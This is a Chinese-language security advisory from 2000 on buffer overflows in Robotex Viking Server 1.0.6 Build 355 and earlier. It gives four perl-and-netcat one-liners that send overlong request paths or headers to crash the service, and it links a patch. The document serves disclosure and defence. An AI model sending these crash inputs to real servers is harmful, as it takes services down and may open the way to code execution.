发布日期：2000-08-29
更新日期：2000-08-29

受影响系统：

  Robotex Viking Server 1.0.6 Build 355 以及更低版本
      - Microsoft Windows 95
      - Microsoft Windows NT 4.0

不受影响系统：

  Robotex Viking Server 1.0.6 Build 370 以及更高版本
     - Microsoft Windows 95
     - Microsoft Windows NT 4.0

描述：

---

Robotex Viking Server中存在几处缓冲区溢出，于是恶意的用户可能使服务崩溃，
甚至执行任意代码。

<* 来源：Aviram Jenik (aviram@beyondsecurity.com) *>







测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

下列命令导致Viking Server崩溃：

1)
GET [x11765] HTTP/1.1<回车><回车>
(Cmd: perl -e "print \"GET @{['x'x11765]} HTTP/1.1\n\n\""|nc 127.1 80)

2)
GET / HTTP/1.1<回车>
Unless-Modified-Since: [x14765]<回车><回车>
(Cmd: perl -e "print \"GET / HTTP/1.1\nUnless-Modified-Since: @{['x'x14765]}\n\n\""|nc 127.1 80)

3)
GET / HTTP/1.1<回车>
If-Range: [x14765]<回车><回车>
(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Range: @{['x'x14765]}\n\n\""|nc 127.1 80)

4)
GET / HTTP/1.1<回车>
If-Modified-Since: [x14765]<回车><回车>
(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Modified-Since: @{['x'x14765]}\n\n\""|nc 127.1 80)


建议：

---

Robotex发布了如下补丁：

Robotex Viking Server 1.0.6 Build 355 及其以前版本：
http://www.robtex.com/files/viking/beta/viking.zip




浏览次数：6238
严重程度：0（网友投票）